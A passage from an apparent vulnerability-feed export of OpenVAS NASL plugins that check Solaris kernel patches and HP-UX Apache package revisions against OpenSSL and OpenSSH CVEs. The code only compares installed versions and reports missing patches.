MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Kernel on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855702\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-23 10:48:35 +0200 (Wed, 23 Sep 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"122301-42\");\n script_cve_id(\"CVE-2008-1483\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name(\"Solaris Update for Kernel 122301-42\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-122301-42-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"122301-42\", package:\"SUNWatfsu SUNWarc SUNWrsg SUNWcstl SUNWsshdu SUNWcar.i SUNWrsgk SUNWcsu SUNWnfscr SUNWnfssu SUNWaudit SUNWcsr SUNWsshdr SUNWmdb SUNWvolu SUNWudfr SUNWnfscu SUNWsshcu SUNWatfsr SUNWsshu SUNWcsl SUNWsshr SUNWnfssr SUNWhea\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:48", "description": "Check for the Version of Kernel", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for Kernel 122300-40", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2008-1483"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855612", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855612", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Kernel 122300-40\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Kernel on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855612\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:31:50 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"122300-40\");\n script_cve_id(\"CVE-2008-1483\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name( \"Solaris Update for Kernel 122300-40\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-122300-40-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"122300-40\", package:\"SUNWsshcu SUNWcar.us SUNWarc SUNWcar.m SUNWpdx SUNWmdb SUNWaudit SUNWsshdu FJSVhea SUNWcsl SUNWsshdr SUNWefcx.u SUNWsshr SUNWdrr.u SUNWdrrx.us SUNWcsxu SUNWcarx.us SUNWpiclu SUNWmdbx SUNWvolr SUNWdrr.us SUNWcsr SUNWefcx.us SUNWpd SUNWhea SUNWcslx SUNWcstlx SUNWcarx.u SUNWsshu SUNWcsu SUNWcar.u SUNWdrcrx.u SUNWdrrx.u SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:39:16", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for kernel 127127-11", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2007-5135"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855322", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855322", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for kernel 127127-11\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"kernel on solaris_5.10_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855322\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:31:50 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"127127-11\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2007-5135\");\n script_name( \"Solaris Update for kernel 127127-11\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-127127-11-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"127127-11\", package:\"SUNWgssdh SUNWcakr.u SUNWrcmdc SUNWpsu SUNWfss SUNWatfsu SUNWscplp SUNWudapltu SUNWrds SUNWarc SUNWcakrnt2000.v SUNWfmd SUNWintgige SUNWbtool SUNWidn.u FJSVcpcu SUNWperl584core SUNWypr SUNWcry SUNWkrbu SUNWdrcr.u SUNWsmapi SUNWtavor SUNWgssk SUNWmdb SUNWzfsu SUNWaudit SUNWtsr SUNWldomr.v SUNWiopc.v SUNWcakr.us SUNWpapi SUNWcart200.v SUNWcpr.u SUNWkvm.u SUNWsndmu SUNWnfssu SUNWkdcu SUNWmdr SUNWpcr SUNWkvm.v SUNWkvm.us FJSVhea SUNWxcu4 SUNWudapltr SUNWdtrc SUNWopenssl-libraries FJSVfmd SUNWus.u SUNWcsl FJSVmdbr SUNWcpcu SUNWrcmds SUNWvolu SUNWniumx.v SUNWcpc.v SUNWib SUNWnisu SUNWtoo SUNWcryr SUNWdrr.u FJSVpiclu SUNWkvmt200.v SUNWefc.u SUNWtnetc SUNWpiclu SUNWtsg SUNWypu SUNWftduu SUNWppm SUNWcakr.v SUNWusb SUNWn2cp.v SUNWcti2.u SUNWzfsr SUNWdrr.us SUNWckr SUNWcsr SUNWfruid SUNW1394 SUNWgss SUNWkrbr SUNWtsu SUNWmdbr SUNWpd SUNWldomu.v SUNWpcu SUNWzfskr SUNWarcr SUNWmdu FJSVmdb SUNWpamsc SUNWwbsup SUNWcar.v SUNWhea SUNWnfsckr SUNWdtrp SUNWspnego SUNWdcar SUNWcpc.us SUNWpl5u SUNWnfsskr SUNWtnetd SUNWcslr SUNWippcore SUNWcsu SUNWust1.v SUNWnxge.v SUNWnfscu SUNWesu SUNWnxge.u SUNWcsd SUNWfruip.u SUNWpsr SUNWssad SUNWpdu SUNWcpc.u SUNWipplr SUNWpsm-lpd SUNWluxl SUNWefc.us SUNWzoneu SUNWipplu SUNWust2.v SUNWnfscr SUNWwrsm.u SUNWftdur SUNWpiclr SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:54", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for kernel 127127-11", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2007-5135"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855322", "href": "http://plugins.openvas.org/nasl.php?oid=855322", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for kernel 127127-11\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"kernel on solaris_5.10_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855322);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:31:50 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"127127-11\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2007-5135\");\n script_name( \"Solaris Update for kernel 127127-11\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-127127-11-1\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"127127-11\", package:\"SUNWgssdh SUNWcakr.u SUNWrcmdc SUNWpsu SUNWfss SUNWatfsu SUNWscplp SUNWudapltu SUNWrds SUNWarc SUNWcakrnt2000.v SUNWfmd SUNWintgige SUNWbtool SUNWidn.u FJSVcpcu SUNWperl584core SUNWypr SUNWcry SUNWkrbu SUNWdrcr.u SUNWsmapi SUNWtavor SUNWgssk SUNWmdb SUNWzfsu SUNWaudit SUNWtsr SUNWldomr.v SUNWiopc.v SUNWcakr.us SUNWpapi SUNWcart200.v SUNWcpr.u SUNWkvm.u SUNWsndmu SUNWnfssu SUNWkdcu SUNWmdr SUNWpcr SUNWkvm.v SUNWkvm.us FJSVhea SUNWxcu4 SUNWudapltr SUNWdtrc SUNWopenssl-libraries FJSVfmd SUNWus.u SUNWcsl FJSVmdbr SUNWcpcu SUNWrcmds SUNWvolu SUNWniumx.v SUNWcpc.v SUNWib SUNWnisu SUNWtoo SUNWcryr SUNWdrr.u FJSVpiclu SUNWkvmt200.v SUNWefc.u SUNWtnetc SUNWpiclu SUNWtsg SUNWypu SUNWftduu SUNWppm SUNWcakr.v SUNWusb SUNWn2cp.v SUNWcti2.u SUNWzfsr SUNWdrr.us SUNWckr SUNWcsr SUNWfruid SUNW1394 SUNWgss SUNWkrbr SUNWtsu SUNWmdbr SUNWpd SUNWldomu.v SUNWpcu SUNWzfskr SUNWarcr SUNWmdu FJSVmdb SUNWpamsc SUNWwbsup SUNWcar.v SUNWhea SUNWnfsckr SUNWdtrp SUNWspnego SUNWdcar SUNWcpc.us SUNWpl5u SUNWnfsskr SUNWtnetd SUNWcslr SUNWippcore SUNWcsu SUNWust1.v SUNWnxge.v SUNWnfscu SUNWesu SUNWnxge.u SUNWcsd SUNWfruip.u SUNWpsr SUNWssad SUNWpdu SUNWcpc.u SUNWipplr SUNWpsm-lpd SUNWluxl SUNWefc.us SUNWzoneu SUNWipplu SUNWust2.v SUNWnfscr SUNWwrsm.u SUNWftdur SUNWpiclr SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:16", "description": "Check for the Version of Apache Remote Execution of Arbitrary Code", "cvss3": {}, "published": "2009-05-05T00:00:00", "type": "openvas", "title": "HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2005-2969", "CVE-2006-4339"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:835119", "href": "http://plugins.openvas.org/nasl.php?oid=835119", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote execution of arbitrary code\n Denial of Service (DoS)\n and unauthorized access.\";\ntag_affected = \"Apache Remote Execution of Arbitrary Code on\n HP-UX B.11.11, B.11.23, and B.11.31\";\ntag_insight = \"Potential security vulnerabilities have been identified with Apache running \n on HP-UX. These vulnerabilities could be exploited remotely to allow \n execution of arbitrary code, Denial of Service (DoS), or unauthorized \n access.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00849540-2\");\n script_id(835119);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02186\");\n script_cve_id(\"CVE-2006-2940\", \"CVE-2006-2937\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2005-2969\");\n script_name( \"HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186\");\n\n script_summary(\"Check for the Version of Apache Remote Execution of Arbitrary Code\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.58.01\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.58.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.58.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.58.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:18", "description": "Check for the Version of Kernel", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for Kernel 122301-40", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2008-1483"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855018", "href": "http://plugins.openvas.org/nasl.php?oid=855018", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Kernel 122301-40\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Kernel on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855018);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:31:50 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"122301-40\");\n script_cve_id(\"CVE-2008-1483\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name( \"Solaris Update for Kernel 122301-40\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-122301-40-1\");\n\n script_summary(\"Check for the Version of Kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"122301-40\", package:\"SUNWsshcu SUNWcar.i SUNWarc SUNWmdb SUNWaudit SUNWsshdu SUNWcsl SUNWsshdr SUNWsshr SUNWcsr SUNWhea SUNWsshu SUNWcsu SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:55", "description": "Check for the Version of Kernel", "cvss3": {}, "published": "2009-09-23T00:00:00", "type": "openvas", "title": "Solaris Update for Kernel 122301-42", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2008-1483"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855702", "href": "http://plugins.openvas.org/nasl.php?oid=855702", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Kernel 122301-42\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Kernel on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855702);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-23 10:48:35 +0200 (Wed, 23 Sep 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"122301-42\");\n script_cve_id(\"CVE-2008-1483\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name(\"Solaris Update for Kernel 122301-42\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-122301-42-1\");\n\n script_summary(\"Check for the Version of Kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"122301-42\", package:\"SUNWatfsu SUNWarc SUNWrsg SUNWcstl SUNWsshdu SUNWcar.i SUNWrsgk SUNWcsu SUNWnfscr SUNWnfssu SUNWaudit SUNWcsr SUNWsshdr SUNWmdb SUNWvolu SUNWudfr SUNWnfscu SUNWsshcu SUNWatfsr SUNWsshu SUNWcsl SUNWsshr SUNWnfssr SUNWhea\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:47", "description": "Check for the Version of Kernel", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "Solaris Update for Kernel 122301-44", "bulletinFamily": 